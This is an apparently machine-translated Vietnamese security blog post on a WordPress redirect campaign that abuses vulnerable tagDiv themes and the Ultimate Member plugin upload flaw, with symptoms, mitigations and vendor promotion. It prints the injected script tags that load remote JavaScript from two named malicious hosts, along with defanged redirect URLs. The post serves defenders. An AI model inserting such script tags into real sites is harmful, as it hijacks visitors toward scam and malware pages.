Computer >> Máy Tính >  >> Kết nối mạng >> An ninh mạng

Chiến dịch chuyển hướng WordPress:Chủ đề tagDiv dễ bị tấn công và các plugin cuối cùng dành cho thành viên

Mỗi ngày trôi qua, các trường hợp lây nhiễm WordPress chuyển hướng khách truy cập đến các trang đáng ngờ đang trở nên phổ biến. Gần đây, một lỗ hổng đã được phát hiện trong tagDiv Themes và Ultimate Member Plugins. Trong bản hack chuyển hướng WordPress này, khách truy cập vào trang web của bạn được chuyển hướng đến các trang lừa đảo hoặc độc hại.

Trong cuộc tấn công này, người dùng, khi được chuyển hướng, được đưa đến các trang gây khó chịu với URL tùy ý

hxxp utroro.com/xyz  or 

hxxp://murieh.abc/xyz or

hxxps://unverf.com/xyz

và đánh bóng hình ảnh reCAPTCHA. Văn bản được hiển thị cố gắng đánh lừa khách truy cập để cho phép thông báo của trình duyệt mà không tiết lộ động cơ.

Chiến dịch chuyển hướng WordPress:Chủ đề tagDiv dễ bị tấn công và các plugin cuối cùng dành cho thành viên

Hơn nữa, Google sẽ phạt bạn bằng cách đưa trang web của bạn vào danh sách đen chống lại Pishing và trang web bị tấn công. Các trình duyệt web sẽ hiển thị thông báo cảnh báo cho những khách truy cập vào trang web của bạn.

Tập lệnh độc hại được chèn

Quá trình lây nhiễm liên quan đến mã từ một trong hai trang web: cdn.allyouwant.online. và cdn.eeduelements.com.

Cái trước đã được sử dụng trong các giai đoạn gần đây của chiến dịch độc hại này và cái sau đã được sử dụng ngay từ đầu.

...
<script type='text/javascript' src='hxxps://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script><script type='text/javascript' src='hxxps://cdn.allyouwant.online/main.js?t=lp1'></script></head>
...

Hiện tại hơn 1700 trang web có tập lệnh cdn.eeduelements.com và hơn 500 trang web có tập lệnh cdn.allyouwant.online.

Lo lắng về việc hack chuyển hướng WordPress? Gửi tin nhắn cho chúng tôi trên tiện ích trò chuyện và chúng tôi rất sẵn lòng giúp bạn sửa lỗi này. Bảo mật trang web WordPress của tôi ngay bây giờ.

Vectơ tấn công trong chủ đề tagDiv

Những người chính đứng sau khai thác WordPress này là chủ đề tagDiv và lỗ hổng được tìm thấy gần đây (và đã được vá) trong một Thành viên cuối cùng phổ biến plugin có 100.000+ cài đặt đang hoạt động.

Đối với chủ đề tagDiv đã lỗi thời , một phần mềm độc hại sẽ xuất hiện như sau:

Chiến dịch chuyển hướng WordPress:Chủ đề tagDiv dễ bị tấn công và các plugin cuối cùng dành cho thành viên

Lỗ hổng trong Plugin thành viên cuối cùng

Lỗ hổng trong Plugin thành viên cuối cùng là Tải lên tệp tùy ý chưa được xác thực. Mặc dù lỗ hổng bảo mật đã được sửa vào ngày 9 tháng 8 năm 2018.

Chiến dịch chuyển hướng WordPress:Chủ đề tagDiv dễ bị tấn công và các plugin cuối cùng dành cho thành viên

Các triệu chứng của Chiến dịch chuyển hướng WordPress:Khai thác các plugin thành viên cuối cùng

  1. Index.php bị hỏng
  2. Tệp PHP không xác định trong thư mục / wp-content / plugins / ultimate-member / include / images / smile
  3. Nhật ký lỗi hiển thị:wp-content / plugins / ultimate-member / asset / dynamic_css / dynamic_profile.php trên dòng 5 và dòng 6
  4. Trang web được chuyển hướng đến các trang web không mong muốn (Phần mềm quảng cáo)
  5. Cửa sổ bật lên được hiển thị khi truy cập trang chủ
  6. Thông tin thẻ tín dụng bị đánh cắp
  7. Các tệp không xác định được tạo trên máy chủ
  8. Các tệp truy vấn trong WordPress và các thư mục plugin đã được sửa đổi
  9. Mã vô nghĩa trong index.php

Hack chuyển hướng WordPress:Giảm thiểu

Nhiễm trùng chuyển hướng WordPress này sử dụng một số vectơ tấn công khác và một số biến thể của mã đáng ngờ. Dưới đây là một số bước để giảm thiểu chuyển hướng WordPress:

  1. Cập nhật tất cả các chủ đề và plugin lên phiên bản mới nhất.
  2. Thiết lập Xác thực HTTP ngăn không cho tệp PHP truy cập trực tiếp vào thư mục tải lên. Điều này nhằm ngăn chặn việc thực thi trái phép.
  3. Có thể tìm thấy và xóa phần mềm độc hại trong giao diện quản trị của chủ đề trong trường hợp bị nhiễm tagDiv.
  4. Xóa tất cả các tệp PHP trong các thư mục con dưới wp-content / uploads / ultimatemember / temp / trong trường hợp khai thác Ultimate Member Plugin.

Các chiến dịch chuyển hướng độc hại này thường xuyên thay đổi mã lây nhiễm và các tệp bị ảnh hưởng. Tốt nhất bạn nên tham khảo ý kiến ​​của chuyên gia bảo mật.

Tham khảo ý kiến ​​chuyên gia bảo mật của Astra ngay bây giờ để làm sạch phần mềm độc hại ngay lập tức. Tường lửa mạnh mẽ của chúng tôi bảo vệ trang web của bạn khỏi XSS, LFI, RFI, SQL Injection, Bad bot, Máy quét lỗ hổng bảo mật tự động và hơn 80 mối đe dọa bảo mật. Bảo mật trang web của tôi ngay bây giờ.